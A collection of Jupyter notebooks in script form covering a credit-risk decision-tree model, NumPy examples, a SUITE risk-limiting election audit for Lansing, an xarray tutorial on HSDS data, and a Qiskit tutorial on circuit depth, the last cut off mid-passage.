for j in range (len (cat_attributes_list)): ref = cat_attributes_list[i] feat = cat_attributes_list[j] #correlation corr = cramer_v(df3[ref], df3[feat]) #append a list corr_list.append (corr) #append a correlation list for each ref attributes corr_dict[ref] = corr_list # + d = pd.DataFrame (corr_dict) d = d.set_index (d.columns) sns.heatmap (d, annot = True) # - # ## 4.0. Data Preparation df4 = df3.copy() df3.head() # ### 4.1. Rescaling # + rs = RobustScaler() mms = MinMaxScaler() #person_age df4['person_age'] = rs.fit_transform ( df4[['person_age']].values) pickle.dump( rs, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/person_age_scaler.pkl', 'wb' )) #person_income df4['person_income'] = rs.fit_transform ( df4[['person_income']].values) pickle.dump( rs, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/person_income_scaler.pkl', 'wb' )) #person_emp_length df4['person_emp_length'] = rs.fit_transform ( df4[['person_emp_length']].values) #loan_amnt df4['loan_amnt'] = rs.fit_transform ( df4[['loan_amnt']].values) pickle.dump( rs, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/loan_amnt_scaler.pkl', 'wb' )) #loan_int_rate df4['loan_int_rate'] = mms.fit_transform ( df4[['loan_int_rate']].values) #loan_percent_income df4['loan_percent_income'] = rs.fit_transform ( df4[['loan_percent_income']].values) #cb_person_cred_hist_length df4['cb_person_cred_hist_length'] = rs.fit_transform ( df4[['cb_person_cred_hist_length']].values) # - # ### 4.2. Tranformacao # + #person_home_ownership lab_enc_home = LabelEncoder() df4['person_home_ownership'] = lab_enc_home.fit_transform(df4['person_home_ownership']) pickle.dump( lab_enc_home, open( '/Users/marin/reposit/Credit_Card_Risk/deploy/person_home_ownership_scaler.pkl', 'wb' )) #loan_intent lab_enc_intent = LabelEncoder() df4['loan_intent'] = lab_enc_home.fit_transform(df4['loan_intent']) #cb_person_default_on_file lab_enc_file = LabelEncoder() df4['cb_person_default_on_file'] = lab_enc_home.fit_transform(df4['cb_person_default_on_file']) #loan_grade enc_grade_dict = {'A':1 ,'B':2 ,'C':3 ,'D':4 ,'E':5 ,'F':6 , 'G':7} df4['loan_grade'] = df4['loan_grade'].map( enc_grade_dict ) # - # ### 5.0. Feature Selection df5 = df4.copy() df5.columns cols_drop = ['df_index','age_binned','age_binned1', 'hist_binned', 'hist_binned1', 'rate_binned','emp_length_binned', 'emp_length_binned1', 'person_income_binned'] df5 = df5.drop( cols_drop, axis=1 ) # ### 6.0. Machine Learning Modelling df6 = df5.copy() df6.head() df6.columns X_credit = df6.drop('loan_status',1).values y_credit = df6.loc[:,'loan_status'].values X_cred_train, X_cred_test, y_cred_train, y_cred_teste = train_test_split(X_credit, y_credit, test_size = 0.25, random_state = 123 ,shuffle = True ,stratify = y_credit,) arvore_credit = DecisionTreeClassifier(criterion='entropy', random_state = 0) arvore_credit.fit(X_cred_train, y_cred_train) prev = arvore_credit.predict(X_cred_test) accuracy_score(y_cred_teste, prev) confusion_matrix(y_cred_teste, prev) print(classification_report(y_cred_teste, prev)) pickle.dump( arvore_credit, open ('/Users/marin/reposit/Credit_Card_Risk/algrts_ml/model_credit_risk.pkl', 'wb')) # ### 7.0. Deploy - Prediction df = df6.drop('loan_status', axis = 1) data = df.to_json(orient = 'records') #data = json.dumps(df.to_dict ( orient = 'records')) # + #url = 'http://192.168.0.108:5000/predict' url = 'https://credit-risk-model-app.herokuapp.com/predict' data = data header = {'Content-type': 'application/json'} #Request r = requests.post( url = url, data = data, headers = header) print( 'Status Code {}'.format( r.status_code ) ) # - d1 = pd.DataFrame( r.json(), columns=r.json()[0].keys() ) d1.columns d1['prediction'].value_counts().plot.barh(title="Proportion of Status") # ### 8.0. Class In Production class CreditRisk( object ): def __init__( self ): self.person_age_scaler = pickle.load( open( 'parameter/person_age_scaler.pkl', 'rb')) self.loan_amnt_scaler = pickle.load( open( 'parameter/loan_amnt_scaler.pkl', 'rb')) self.person_income_scaler = pickle.load( open( 'parameter/person_income_scaler.pkl', 'rb')) self.person_home_ownership_scaler = pickle.load( open( 'parameter/person_home_ownership_scaler.pkl', 'rb')) def data_preparation( self, df ): df['person_age_scaler'] = self.person_age_scaler.transform( df[['person_age_scaler']].values ) df['loan_amnt_scaler'] = self.loan_amnt_scaler.transform( df[['loan_amnt_scaler']].values ) df['person_income_scaler'] = self.person_income_scaler.transform( df[['person_income_scaler']].values ) df['person_home_ownership_scaler'] = self.person_home_ownership_scaler.transform( df[['person_home_ownership_scaler']].values ) return df
Credit_Risk_Prediction.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from datascience import * import numpy as np # # NumPy Array examples # # These are some of the things we can do in NumPy! temperatures = make_array(3, 11, 7, 5, 6, 10, 12, 14, 15.6, 3.4, 2.1) temperatures # + # np.multiply? # - temperatures * (9.0/5.0) + 32 # # Some more NumPy Examples with Tables # # Let's do the same thing with tables! cities = Table().read_table("cities.csv") cities cities.column("Temperature in C") * 9.0/5.0 + 32.0 cities.with_column("Temperature in F", cities.column("Temperature in C") * 9.0/5.0 + 32.0)
coding snippets/lecture_5_6_snippets/Lecture 6 Examples.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Tools for SUITE Risk-Limiting Election Audits # # This Jupyter notebook implements some tools to conduct "hybrid" stratified risk-limiting audits as described in Risk-Limiting Audits by Stratified Union-Intersection Tests of Elections (SUITE), by Ottoboni, Stark, Lindeman, and McBurnett. # # For an implementation of tools for "comparison" risk-limiting audits as described in AGI, see http://statistics.berkeley.edu/~stark/Vote/auditTools.htm. For the sister ballot polling tool, see https://www.stat.berkeley.edu/~stark/Vote/ballotPollTools.htm. # # The tools on this page help perform the following steps: # # * Choose a number of ballots to audit in each stratum initially, on the assumption that the contest outcome is correct. # * Select random samples of ballots in each stratum. # * Find those ballots using ballot manifests. # * Determine whether the audit can stop, given the votes on the ballots in the sample. # * If the audit cannot stop yet, estimate how many additional ballots will need to be audited. # # This notebook is already filled out with an example election. It can be run from start to finish to demonstrate how the tool works. The numbers in the example can be deleted and replaced with actual data for an audit. # ## Introduction to Jupyter Notebooks # # We leave [a comprehensive introduction to the Jupyter notebook](https://jupyter-notebook.readthedocs.io/en/stable/notebook.html) to the experts, but below are a few features you should know to use this tool: # # * notebooks are comprised of _cells_, blocks of code that can be run together. To the left of a code cell, you will see either [] (indicating that it has not been run yet) or [x] (where x is a number indicating that it was the xth cell to be run). You can the code in a cell by clicking into the cell, indicated by a green box around the cell, and running `Ctrl + Enter`. # * code lines that begin with `#` are comments. They're not actually run, but are there to describe what the code is doing. # * the text in a notebook is also written in a cell. Instead of a code cell, it's a Markdown cell. Clicking on a text cell will make it editable; running `Ctrl + Enter` will render it back into text. # * the order in which cells are executed matters. Code in later cells depends on earlier cells. However, it is _possible_ to run cells out of order or rerun cells that have been run earlier; this can cause problem. In general, it is __best practice__ to rerun the entire notebook after you have filled in the values you want. To do so, click on the `Kernel` menu at the top of the page and select `Restart & Run All`. This will clear the memory and rerun everything in the prescribed order. # # # The following cell imports all the necessary functionality from packages. # + from __future__ import print_function from ipywidgets import interact, interactive, fixed, interact_manual import ipywidgets as widgets from IPython.display import display, HTML from collections import OrderedDict from itertools import product import math import json import pprint import numpy as np from ballot_comparison import ballot_comparison_pvalue from fishers_combination import maximize_fisher_combined_pvalue, create_modulus from sprt import ballot_polling_sprt from cryptorandom.cryptorandom import SHA256 from cryptorandom.sample import random_sample from suite_tools import write_audit_parameters, write_audit_results, \ check_valid_audit_parameters, check_valid_vote_counts, \ check_overvote_rates, find_winners_losers, print_reported_votes, \ estimate_n, estimate_escalation_n, \ sample_from_manifest, write_ballots_to_sample, \ audit_contest, check_polling_sample_size, plot_nratio_sample_sizes import warnings warnings.filterwarnings("ignore") # - # # Input the global audit parameters. # # For an audit, you should input the following global parameters in the cell below: # # * contest-specific parameters: # * `risk_limit`: the risk limit for the audit # * `stratum_sizes`: total ballots in the two strata, [CVR total, no-CVR total] # * `num_winners`: number of winners in the contest # * software parameters: # * `seed`: the numeric seed for the pseudo-random number generator used to draw samples of ballots. Use, e.g., 20 rolls of a 10-sided die # * `gamma`: the gamma parameter used in the ballot-polling method from <NAME> Stark (2012). Default value of 1.03905 is generally accepted # * `lambda_step`: the initial step size in the grid search over the way error is allocated across the CVR and no-CVR strata in SUITE. Default 0.05 is acceptable # * initial sample size estimate parameters: # * `o1_rate`: expected rate of 1-vote overstatements in the CVR stratum # * `o2_rate`: expected rate of 2-vote overstatements in the CVR stratum # * `u1_rate`: expected rate of 1-vote understatements in the CVR stratum # * `u2_rate`: expected rate of 2-vote understatements in the CVR stratum # * `n_ratio`: what fraction of the sample is taken from the CVR stratum. Default is to allocate sample in proportion to ballots cast in each stratum. # # # contest-specific parameters risk_limit = 0.09 # risk limit #stratum_sizes = [10619, 10709] stratum_sizes = [0, 10619+ 10709] num_winners = 1 # maximum number of winners, per social choice function # software parameters seed = 49228331723515618585 # use, e.g., 20 rolls of a 10-sided die gamma=1.03905 # gamma from Lindeman and Stark (2012) lambda_step = 0.05 # stepsize for the discrete bounds on Fisher's combining function # initial sample size parameters o1_rate = 0.002 # expect 2 1-vote overstatements per 1000 ballots in the CVR stratum o2_rate = 0 # expect 0 2-vote overstatements u1_rate = 0 # expect 0 1-vote understatements u2_rate = 0 # expect 0 2-vote understatements n_ratio = stratum_sizes[0]/np.sum(stratum_sizes) # allocate sample in proportion to ballots cast in each stratum check_valid_audit_parameters(risk_limit, lambda_step, o1_rate, o2_rate, \ u1_rate, u2_rate, stratum_sizes, n_ratio, num_winners) # The next cell saves the input parameters to a JSON file. You may change the file name in quotes but do not change the rest of the code. write_audit_parameters("../log/lansing_audit_parameters.json",\ risk_limit, stratum_sizes, num_winners, seed, gamma, \ lambda_step, o1_rate, o2_rate, \ u1_rate, u2_rate, n_ratio) # # Enter the reported votes # # Candidates are stored in a data structure called a dictionary. Enter the candidate name and the votes in each stratum, [votes in CVR stratum, votes in no-CVR stratum], in the cell below. The following cell will calculate the vote totals, margins, winners, and losers. # + # input number of winners # input names as well as reported votes in each stratum # candidates are a dict with name, [votes in CVR stratum, votes in no-CVR stratum] #candidates = {"Neal" : [3925, 3769], # "Ward": [5257, 5052]} candidates = {"Neal" : [0, 3925+3769], "Ward": [0, 5257+ 5052]} # Run validity check on the input vote totals check_valid_vote_counts(candidates, num_winners, stratum_sizes) # + # compute reported winners, losers, and pairwise margins. Nothing should be printed. (candidates, margins, winners, losers) = find_winners_losers(candidates, num_winners) # Check that overstatement rates are compatible with the reported results check_overvote_rates(margins=margins, total_votes=sum(stratum_sizes), o1_rate=o1_rate, o2_rate=o2_rate) # - # print reported winners, losers, and pairwise margins print_reported_votes(candidates, winners, losers, margins, stratum_sizes,\ print_alphabetical=False) # # Initial sample size estimates. # # The initial sample size tool helps you anticipate the number of randomly selected ballots that might need to be inspected to attain a given limit on the risk, under the assumption that the reported percentages for each candidate are correct. # # It is completely legitimate to sample one at a time and rerun the SUITE calculations, but this form can help auditors anticipate how many ballots the audit is likely to require and to retrieve ballots more efficiently. # # This code will estimate the sample size needed to attain the desired risk limit in an audit of the contest between each pair of winning and losing candidates. The overall sample size will be allocated to the CVR stratum in `n_ratio` proportion and to the no-CVR stratum in `1-n_ratio` proportion. The sample size estimates for each pair will be printed below. The expected sample size needed for the audit is the _maximum_ of the sample sizes for each winner, loser pair: the sample must be large enough to confirm the closest margin. # # Taking a larger initial sample can avoid needing to expand the sample later, depending on the rate of ballots for each candidate in the sample. Avoiding "escalation" can make the audit less complicated. # # + # Calculate expected sample size across (winner, loser) pairs sample_sizes = {} for k in product(winners, losers): sample_sizes[k] = estimate_n(N_w1 = candidates[k[0]][0],\ N_w2 = candidates[k[0]][1],\ N_l1 = candidates[k[1]][0],\ N_l2 = candidates[k[1]][1],\ N1 = stratum_sizes[0],\ N2 = stratum_sizes[1],\ o1_rate = o1_rate,\ o2_rate = o2_rate,\ u1_rate = u1_rate,\ u2_rate = u2_rate,\ n_ratio = n_ratio,\ risk_limit = 0.09,\ gamma = gamma,\ stepsize = lambda_step,\ min_n = 5,\ risk_limit_tol = 0.8) # + sample_size = np.amax([v[0]+v[1] for v in sample_sizes.values()]) print("estimated sample sizes for each contest, written as (cvr stratum, no-cvr stratum):\n") pprint.pprint(sample_sizes) print('\n\nexpected total sample size needed to confirm all pairs:', sample_size) # - check_polling_sample_size(candidates, winners, losers, stratum_sizes, risk_limit) # + # Run this cell to plot the total size as a function of n_ratio #plot_nratio_sample_sizes(candidates, winners, losers, stratum_sizes, n_ratio_step=0.05, o1_rate=o1_rate) # - # # Random sampling # The next tool helps generate pseudo-random samples of ballots in each stratum. Further below, there is a form to help find the individual, randomly selected ballots among the batches in which ballots are stored. # # The first cell below initializes the SHA-256 cryptographically secure pseudo-random number generator. Details on why you might want to use this pseudo-random number generator instead of the Python default can be found in [Stark and Ottoboni (2018)](https://arxiv.org/abs/1810.10985). # # Input your desired sample sizes in the second cell below. Input the number of ballots you want in the sample. The default values that are pre-filled are taken from the initial sample size estimates above. # # The third cell should not be modified. It draws the samples from each stratum, using sampling _with_ replacement for the CVR stratum and sampling _without_ replacement for the no-CVR stratum. This means that some ballots in the CVR stratum could be sampled more than once. # # # **NOTE:** # If this section is giving errors, you probably need to update your version of `cryptorandom`. # # ``` # pip install [--update] cryptorandom # ``` # initialize the PRNG prng = SHA256(seed) # Input the sample sizes for each stratum. # Defaults to those found using the initial sample size tool above. n1 = math.ceil(sample_size*n_ratio) n2 = sample_size-n1 # + # CVR stratum initial sample size, sampled with replacement sample1 = prng.randint(1, stratum_sizes[0]+1, size=n1) # No-CVR ballots are sampled without replacement sample2 = random_sample(stratum_sizes[1], size=n2, replace=False, prng=prng) # - # ### CVR stratum sample print("CVR stratum sample:\n", sample1) m = np.zeros_like(sample1, dtype=bool) m[np.unique(sample1, return_index=True)[1]] = True print("CVR stratum repeated ballots:\n", sample1[~m]) # ### No-CVR sample print("No-CVR stratum sample:\n", sample2) # # Find ballots using ballot manifest # # Generally, ballots will be stored in batches, for instance, separated by precinct and mode of voting. To make it easier to find individual ballots, it helps to have a ballot manifest that describes how the ballots are stored. # # # Batch label | ballots # --- | --- # Polling place precinct 1 | 130 # Vote by mail precinct 1 | 172 # Polling place precinct 2 | 112 # Vote by mail precinct 2 | 201 # Polling place precinct 3 | 197 # Vote by mail precinct 3 | 188 # # If ballot 500 is selected for audit, which ballot is that? If we take the listing of batches in the order given by the manifest, and we require that within each batch, the ballots are in an order that does not change during the audit, then the 500th ballot is the 86th ballot among the vote by mail ballots for precinct 2: The first three batches have a total of 130+172+112 = 414 ballots. The first ballot in the fourth batch is ballot 415. Ballot 500 is the 86th ballot in the fourth batch. The ballot look-up tool transforms a list of ballot numbers and a ballot manifest into a list of ballots in each batch. # # There must be separate ballot manifests for ballots in the CVR stratum and for ballots in the no-CVR stratum. The manifests should be input as a CSV file with three columns: Batch ID, Scanner ID, and number of ballots. # # The total number of ballots in the manifest must equal the number cast in the contest that is to be audited using the sample. cvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Absentee - less 45.csv", \ sample=sample1, \ stratum_size=stratum_sizes[0]) write_ballots_to_sample("../log/Lansing-sampled-absentee.csv", cvr_sample) print("CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in cvr_sample) ) )) nocvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Election Day - 20 precincts only.csv", \ sample=sample2, \ stratum_size=stratum_sizes[1]) write_ballots_to_sample("../log/Lansing-sampled-election-day.csv", nocvr_sample) print("No CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in nocvr_sample) ) )) # # Enter the sample data # # The audit cannot stop until **all** the sampled ballots have been examined. # ## Sample statistics for the CVR stratum (stratum 1) # # Enter the number of 1-vote and 2-vote over-/understatements that were observed in the sample using the sliders below, then run the cell beneath the sliders to store the values. n1=0 print("The sample size in the CVR stratum was", n1) # + def cvr_audit_inputs(o1, o2, u1, u2): return (o1, o2, u1, u2) cvr_stats = interactive(cvr_audit_inputs, o1 = widgets.IntSlider(min=0,max=n1,value=0), u1 = widgets.IntSlider(min=0,max=n1,value=0), o2 = widgets.IntSlider(min=0,max=n1,value=0), u2 = widgets.IntSlider(min=0,max=n1,value=0)) display(cvr_stats) # - (o1, o2, u1, u2) = [cvr_stats.children[i].value for i in range(4)] # ## Sample statistics for the no-CVR stratum (stratum 2) # # Enter the number of ballots for each candidate that were observed in the sample using the sliders below, then run the cell beneath the sliders to store the values. n2 = 258 print("The sample size in the no-CVR stratum was", n2) # + nocvr_widgets=[] # create the widgets for name in candidates.keys(): nocvr_widgets.append(widgets.IntSlider(value=0,min=0,max=n2,description=name)) # group the widgets into a FlexBox nocvr_audit_inputs = widgets.VBox(children=nocvr_widgets) # display the widgets display(nocvr_audit_inputs) # + # no-CVR sample is stored in a dict with name, votes in the sample observed_poll = {} for widget in nocvr_widgets: observed_poll[widget.description] = widget.value assert np.sum(list(observed_poll.values())) <= n2, "Too many ballots input" pprint.pprint(observed_poll) # - # # What's the risk for this sample? # # The audit looks at every (winner, loser) pair in each contest. Auditing continues until there is strong evidence that every winner in a contest got more votes than every loser in the contest. It does this by considering (winner, loser) pairs. The SUITE risk for every pair will appear beneath the cell below after it is run. The audit continues until all the numbers are not larger than the risk limit. E.g., if the risk limit is 10%, the audit stops when the numbers in the table are all less than 0.1. # Find audit p-values across (winner, loser) pairs n1=0 audit_pvalues = audit_contest(candidates, winners, losers, stratum_sizes, \ n1, n2, o1, o2, u1, u2, observed_poll, \ risk_limit=risk_limit, gamma=gamma, stepsize=lambda_step) pprint.pprint(audit_pvalues) # + # Track contests not yet confirmed contests_not_yet_confirmed = [i[0] for i in audit_pvalues.items() \ if i[1]>risk_limit] print("Pairs not yet confirmed:\n", contests_not_yet_confirmed) winners_not_yet_confirmed = list(set(list(map(lambda x: x[0], contests_not_yet_confirmed)))) losers_not_yet_confirmed = list(set(list(map(lambda x: x[1], contests_not_yet_confirmed)))) # + # Save everything to file, you may change the file name in quotes write_audit_results("../log/lansing_audit_results.json", \ n1, n2, sample1, sample2, \ o1, o2, u1, u2, observed_poll, \ audit_pvalues, prng.getstate()) # - # # Escalation guidance: how many more ballots should be drawn? # # This tool estimates how many more ballots should be examined to confirm any remaining contests. The enlarged sample size is based on the following: # * ballots that have already been sampled # * assumption that we will continue to see overstatements and understatements at the same rate that they've been observed in the sample so far # * assumption that vote proportions in the ballot-polling stratum will reflect the reported proportions # # Given these additional numbers, return to the sampling tool and draw additional ballots, find them with the ballot manifest tool, update the observed sample values, and rerun the SUITE risk calculations. Additional code cells to do this are included below. # + sample_sizes_new = {} # Add a reminder note about the candidate dict structure. for k in contests_not_yet_confirmed: sample_sizes_new[k] = estimate_escalation_n(\ N_w1 = candidates[k[0]][0],\ N_w2 = candidates[k[0]][1],\ N_l1 = candidates[k[1]][0],\ N_l2 = candidates[k[1]][1],\ N1 = stratum_sizes[0],\ N2 = stratum_sizes[1],\ n1 = 0,\ n2 = 258,\ o1_obs = o1,\ o2_obs = o2,\ u1_obs = u1,\ u2_obs = u2,\ n2l_obs = observed_poll[k[1]],\ n2w_obs = observed_poll[k[0]],\ n_ratio = 0,\ risk_limit = risk_limit,\ gamma = gamma,\ stepsize = lambda_step, risk_limit_tol = 0.8) # + sample_size_new = np.amax([v[0]+v[1] for v in sample_sizes_new.values()]) n1_new = np.amax([v[0] for v in sample_sizes_new.values()]) n2_new = np.amax([v[1] for v in sample_sizes_new.values()]) print("estimated sample sizes for each contest, written as (cvr stratum, no-cvr stratum):\n") pprint.pprint(sample_sizes_new) print('\n\nexpected total sample size needed to confirm remaining pairs:', sample_size_new) print("\nDraw this many additional ballots in the CVR stratum:", n1_new - n1) print("Draw this many additional ballots in the no-CVR stratum:", n2_new - n2) # - # # Draw additional ballots # print the current state of the PRNG after drawing the initial samples print(prng) # + # CVR stratum sample size, sampled with replacement sample1 = prng.randint(1, stratum_sizes[0]+1, size=n1_new - n1) # No-CVR ballots are sampled without replacement remaining_ballots = [i for i in range(stratum_sizes[1]) if i not in sample2] sample2 = random_sample(remaining_ballots, size=n2_new - n2, replace=False, prng=prng) # - # ### CVR stratum sample print("CVR stratum sample:\n", sample1) m = np.zeros_like(sample1, dtype=bool) m[np.unique(sample1, return_index=True)[1]] = True print("CVR stratum repeated ballots:\n", sample1[~m]) # ### No-CVR sample print("No-CVR stratum sample:\n", sample2) # # Find ballots using ballot manifest cvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Absentee.csv", \ sample=sample1, \ stratum_size=stratum_sizes[0]) write_ballots_to_sample("../log/lansing-sampled-absentee-2.csv", cvr_sample) print("CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in cvr_sample) ) )) nocvr_sample = sample_from_manifest(filename="../data/City of Lansing Ballot Manifest - Election Day.csv", \ sample=sample2, \ stratum_size=stratum_sizes[1]) write_ballots_to_sample("../log/lansing-sampled-election-day-2.csv", nocvr_sample) print("No CVR sample") display(HTML( '<table><tr>{}</tr></table>'.format( '</tr><tr>'.join( '<td>{}</td>'.format('</td><td>'.join(str(_) for _ in row)) for row in nocvr_sample) ) )) # # Enter the data from the *combined* sample # ## Sample statistics for the CVR stratum (stratum 1). # Update the numbers below to include what was seen in the initial sample PLUS what was seen in the new sample. print("The initial sample size in the CVR stratum was", n1, \ "and the new sample size was", n1_new) print("The observed overstatements and understatements from the original sample were") pprint.pprint({"o1" : o1, "o2" : o2, "u1" : u1, "u2" : u2}) # + # Number of observed... def cvr_audit_inputs(o1, o2, u1, u2): return (o1, o2, u1, u2) cvr_stats = interactive(cvr_audit_inputs, o1 = widgets.IntSlider(min=0,max=n1_new,value=0), u1 = widgets.IntSlider(min=0,max=n1_new,value=0), o2 = widgets.IntSlider(min=0,max=n1_new,value=0), u2 = widgets.IntSlider(min=0,max=n1_new,value=0)) display(cvr_stats) # - (o1, o2, u1, u2) = [cvr_stats.children[i].value for i in range(4)] # ## Sample statistics for the no-CVR stratum (stratum 2) # Update the numbers below to include what was seen in the initial sample PLUS what was seen in the new sample. print("The initial sample size in the no-CVR stratum was", n2, \ "and the new sample size was", n2_new) print("The observed tallies from the original sample were") pprint.pprint(observed_poll) # + nocvr_widgets=[] # create the widgets for name in candidates.keys(): nocvr_widgets.append(widgets.IntSlider(value=0,min=0,max=n2_new,description=name)) # group the widgets into a FlexBox nocvr_audit_inputs = widgets.VBox(children=nocvr_widgets) # display the widgets display(nocvr_audit_inputs) # + # no-CVR sample is stored in a dict with name, votes in the sample observed_poll = {} for widget in nocvr_widgets: observed_poll[widget.description] = widget.value assert np.sum(list(observed_poll.values())) <= n2_new, "Too many ballots input" pprint.pprint(observed_poll) # - # # What's the risk for this sample? # # The audit looks at every (winner, loser) pair in each contest. Auditing continues until there is strong evidence that every winner in a contest got more votes than every loser in the contest. It does this by considering (winner, loser) pairs. The SUITE risk for every pair will appear beneath the cell below after it is run. The audit continues until all the numbers are not larger than the risk limit. E.g., if the risk limit is 10%, the audit stops when the numbers in the table are all less than 0.1. # + # Find audit p-values across (winner, loser) pairs audit_pvalues = audit_contest(candidates, winners_not_yet_confirmed, \ losers_not_yet_confirmed, stratum_sizes, \ n1_new, n2_new, o1, o2, u1, u2, observed_poll, \ risk_limit=risk_limit, gamma=gamma, stepsize=lambda_step) pprint.pprint(audit_pvalues) # + # Track contests not yet confirmed contests_not_yet_confirmed = [i[0] for i in audit_pvalues.items() \ if i[1]>risk_limit] print("Pairs not yet confirmed:\n", contests_not_yet_confirmed) # + # Save everything to file, you may change the file name in quotes write_audit_results("../log/lansing_audit_results2.json", \ n1_new, n2_new, sample1, sample2, \ o1, o2, u1, u2, observed_poll, \ audit_pvalues, prng.getstate())
code/lansing_SUITE.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # 11 Xarray # # Objectives # # * Use the xarray package to connect with the HSDS # * Understand the basic data structures in Xarray # * Read and write netCDF files using Xarray and h5netcdf # * Plotting using Xarray # h5netcdf package not pre-installed, so install here # ! pip install h5netcdf import xarray as xr # This is the location of a NetCDF file that has been installed in HDFLab # The "hdf5:/" prefix indicates it's an HSDS domain rather than a regular posix file domain_path = "hdf5://shared/NASA/NEX-DCP30/tasmax_amon_BCSD_rcp60_r1i1p1_CONUS_NorESM1-M_202101-202512.nc" # load the dataset # Note - xarray uses the term "dataset" to refer to what HDF5 users would call a file # An HDF5 dataset is called a "variable". This can be a bit confusing! # The engine parameter says to use the h5netcdf package. In turn h5netcdf will use h5pyd # when it sees the "hdf5://" prefix in the domain path ds = xr.open_dataset(domain_path, engine="h5netcdf") # From here on, everything is much the same as with XArray used with regular posix files # the standard representation of a dataset will show dimensions, coordinates, data, and attribute # components ds # pull out "tasmax" dataarray with dictionary syntax tasmax = ds["tasmax"] tasmax # or by using dot notation ds.tasmax # named dimensions ds.tasmax.dims # extracting coorindate variables from .coords ds.coords["lon"] # .attrs is a dictionary that can contain arbitrary python objects. Much like with h5py or h5pyd tasmax.attrs # The data array is three-dimensional: time, lon, and lat coordinates tasmax.shape # Plotting methods are built into Xarray. # Xarray uses it's mapping of dimensions to correctly setup # plot axes and legend # time=1 will plot the second time index ds.tasmax.isel(time=1).plot(x="lon")
Tutorial/11-Xarray.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ![qiskit_header.png](../../images/qiskit_header.png) # ## Table of contents # # 1) [Introduction](#introduction) # # # 2) [Circuit Depth](#depth) # # # 3) [Circuit Unitary Factors](#unitary) # # # 4) [Circuits with Classical Registers](#classical) # # # 5) [Gate Set Dependence of Depth](#gate_dependence) # from qiskit import * # %matplotlib inline # ## Introduction <a name='introduction'></a> # # When constructing quantum circuits, there are several properties that help quantify the "size" of the circuits, and their ability to be run on a noisy quantum device. Some of these, like number of qubits, are straightforward to understand, while others like depth and number of tensor components require a bit more explanation. Here we will explain all of these properties, and, in preparation for understanding how circuits change when run on actual devices, highlight the conditions under which they change. # # # ### Basics # Consider the following circuit: # + qc = QuantumCircuit(12) for idx in range(5): qc.h(idx) qc.cx(idx, idx + 5) qc.cx(1, 7) qc.x(8) qc.cx(1, 9) qc.x(7) qc.cx(1, 11) qc.swap(6, 11) qc.swap(6, 9) qc.swap(6, 10) qc.x(6) qc.draw() # - # From the plot, it is easy to see that this circuit has 12 qubits, and a collection of Hadamard, CNOT, X, and SWAP gates. But how to quantify this programmatically? Because we can do single-qubit gates on all the qubits simultaneously, the number of qubits in this circuit is equal to the **width** of the circuit: qc.width() # <div class="alert alert-block alert-warning"> # <b>Warning:</b> For a quantum circuit composed from just qubits, the circuit width is equal to the number of qubits. This is the definition used in quantum computing. However, for more complicated circuits with classical registers, and classically controlled gates, this equivalence breaks down. As such, from now on we will <b>not</b> refer to the number of qubits in a quantum circuit as the width. # </div> # We can also just get the number of qubits directly: qc.n_qubits # It is also straightforward to get the number and type of the gates in a circuit using `count_ops()`: qc.count_ops() # We can also get just the raw count of operations by computing the circuits **size**: qc.size() # ## Quantum Circuit Depth <a name="depth"></a> # A particularly important circuit property is known as the **depth**. The depth of a quantum circuit is a measure of how many "layers" of quantum gates, executed in parallel, it takes to complete the computation defined by the circuit. Because quantum gates take time to implement, the depth of a circuit roughly corresponds to the amount of time it takes the quantum computer to execute the circuit. Thus, the depth of a circuit is one important quantity used to measure if a quantum circuit can be run on a device. # # The depth of a quantum circuit has a mathematical definition as the longest path in a directed acyclic graph (DAG). However, such a definition is a bit hard to grasp, even for experts. Fortunately, the depth of a circuit can be easily understood by anyone familiar with playing [Tetris](https://en.wikipedia.org/wiki/Tetris). To understand this, let us redraw the circuit with the first five CNOT gates colored differently for clarity: # ![depth_1.png](attachment:depth_1.png) # To compute the depth, we turn the circuit counterclockwise so that the beginning of the circuit is at the bottom. We then let the gates fall to the bottom. Later gates stack on earlier gates, and multi-qubit gate components must be stacked at the same height. For the current circuit of interest, this stacking looks like: # ![depth_2.png](attachment:depth_2.png) # We can see that the first five CNOT gates all collapsed down on top of each other, and are stacked on top of the initial set of Hadamard gates. The remaining gates stack on top of the CNOT layer as shown. The stack of gates can be partitioned into "layers", where each layer represents a set of gates that can be executed in parallel on a quantum device (Hardware limitations may restrict the number and/or type of gates that can be run in parallel). The **depth** of the circuit is just the number of layers in the circuit; The depth is equal to the height of the stack of gates. This computation is done for you in qiskit, and we can verify our visual method: qc.depth() # ## Unitary Factors <a name="unitary"></a> # # The circuit we are focusing on here is a 12-qubit circuit. However, does this circuit actually require a 12-qubit quantum computer to run? That is to say, can we compute the same result by running a collection of smaller circuits individually? # # In the limit where only single-qubit gates are performed, it should be clear that each qubit is controlled independently of the rest, and thus we can run each qubit independently and still get the desired result. Thus, the question becomes are there enough entangling gates in the circuit to have all qubits interacting? Again, this is best understood in terms of diagrams. Below, we track the sets of qubits that interact amongst themselves via CNOT gates at each layer in the circuit. # ![tensor_factors_1.png](attachment:tensor_factors_1.png) # We can see that at the end of the computation there are three independent sets of qubits. Thus, our 12-qubit computation is actual two two-qubit calculations and a single eight-qubit computation. We can verify this 